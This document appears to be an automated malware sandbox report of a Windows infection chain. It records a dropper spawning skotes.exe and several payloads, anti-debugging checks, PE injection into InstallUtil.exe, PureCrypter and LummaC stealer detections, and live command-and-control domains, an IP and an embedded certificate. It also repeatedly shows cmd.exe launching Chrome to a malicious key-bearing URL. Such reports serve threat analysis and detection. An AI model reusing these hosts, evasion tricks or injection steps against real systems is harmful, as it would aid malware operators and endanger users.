Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\lIocM276SA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\lIocM276SA.exe

Code function: 0_2_04DF0C09 rdtsc

0_2_04DF0C09

Source: C:\Users\user\Desktop\lIocM276SA.exe

Code function: 0_2_00308868 LdrInitializeThunk,

0_2_00308868

Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_0030652B mov eax, dword ptr fs:[00000030h]	0_2_0030652B
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_0030A302 mov eax, dword ptr fs:[00000030h]	0_2_0030A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0043A302 mov eax, dword ptr fs:[00000030h]	1_2_0043A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0043652B mov eax, dword ptr fs:[00000030h]	1_2_0043652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0043A302 mov eax, dword ptr fs:[00000030h]	2_2_0043A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0043652B mov eax, dword ptr fs:[00000030h]	2_2_0043652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0043A302 mov eax, dword ptr fs:[00000030h]	6_2_0043A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0043652B mov eax, dword ptr fs:[00000030h]	6_2_0043652B

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 0717674af5.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0717674af5.exe PID: 7408, type: MEMORYSTR

Detected PureCrypter Trojan

Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: 162.230.48.189MIIE4DCCAsigAwIBAgIQAMAeZHVIVSErUss7DPlV6zANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZHd3loZ3kwIBcNMjQxMDEyMDMwNTExWhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBkd3eWhneTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANJTLGa9rN2YFVvST0DFJ12Znb0BmHJecxAEhtcGcl8dznIZ6+gfe27Ta71i0MPYAkTbpy2o18YXJXxMVbnJOytIa1XqnPpSrWSXfWHzqCd0TdoKWISPQX29sY2FAPQ3iZUOGyfqi2ez8unncI2ASt66ahfUuhd37pnZlr+1m2xAZ8WNM7anlKnXbWofUl/UPXm502KTew8tYRbYd4Rht0AFOBDud+2N4AU0utFnXocS+fXSbEE824ajcmjU56UaEITnWtnmI0uV01Qowwi3jF8PC0qnxyk99zjOM9T7QYtyqdTnnJdEyxqXynt/XVY6p/ZIyv8PGq/QKu5WtX4jEvXgDnAkQR8Ps2yQ+yfpYhmOeY5u3JFhkInai4p4uZPVrOGxzyf9wQXl+ne1xxq1JTwAhIEffTlebHBBzdnBKxscVwbZF6aqlSL3XPVydR5x68rNYNs0ZIA9IjE7DHOXvXpONAZY3oFxWJswJCCZt1W56HZnfJIkD1ZvPdrHx1fonp5hmX/qT1QlIyHK9fJ//fYURA2Vo0/tIsZh51GKCY9/4u+jNX2ZGvlpVmLcLYfDvnusW4OGH6ASph0nDKQBviDVt8/9ElXuq81pQHAGsuD4o8nLSFeB5txzEBMasWg5/hbYBOzvQiCToAdGnqqOod9AA4Q+lM8PWnVmsjn2roLVAgMBAAGjMjAwMB0GA1UdDgQWBBSiUn1kCNdLD3de1HvsCuXv6hQRcjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA1iBlB8/jryeqRD/gRYyLhZYhTDeAx7xgBcAP9oKkV6X8PNaYdCHZkyBowa9o1Ed9ofhyOtsUYJuyx6whXASniLCcNDVuviydbPngqM6UfZF8ZeU7ZlVE33ubrCQsCKUjrayQEXIWkyIh+MsKDtrek0DI30NxR8/B79gl7JuF8zLmm717EU09y0YIXYvATea+kD2xelHUe2XSg5IDPB/S0T7JeabjeMYMkIY9s7ookWMxCp6mhsCYIdfu0vZ4GlwAN5sMfjVTXMSddhC7nmxZZw705nm5U0b05vkMtmQ3/Sa8+948UT2rFqk0Uh4yG6RPF6DIGJSEENA6ob+zxK0eqTRi6MxIiCWCLzrfncTTWqaeerNC2Lon0amBWcV0HyMLgQtp6GB6fOP/9n2qyXXAMQhrU5IJte6T9gFiePyizeYjyvsGssKk/6gPP2J2AWIBoaWec4qTO90wxL3iV4aT5O6LqjFLHeJrJaYdOwu5vYUfv41AqVsUoPyig/4ig3LzcRNoB+OznNmiDVtFXdUpLri7szn3IFUUw8F1fgzd7sQA7FOVHn26hz3f9PZArLTIqfD7KPXYqLag22UfgBmPTZ37KXuLs4mlrAJadlVfSVr7McQHpcFMiU1e5CjNoJVVPrqPbtqCDghvRLnIeeK9UbokVpsQPpOppKoR0i8RiuQ=="Default:BAPPDATA

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: scriptyprefej.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: navygenerayk.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: founpiuer.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: necklacedmny.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: thumbystriw.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: fadehairucw.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: crisiwarny.store
Source: 2090621607.exe, 00000038.00000002.3008510644.0000000000AA1000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: presticitpo.store

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 474000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 476000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F19008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 474000
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 476000
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C62008

Source: C:\Users\user\Desktop\lIocM276SA.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe "C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe "C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe "C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe "C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
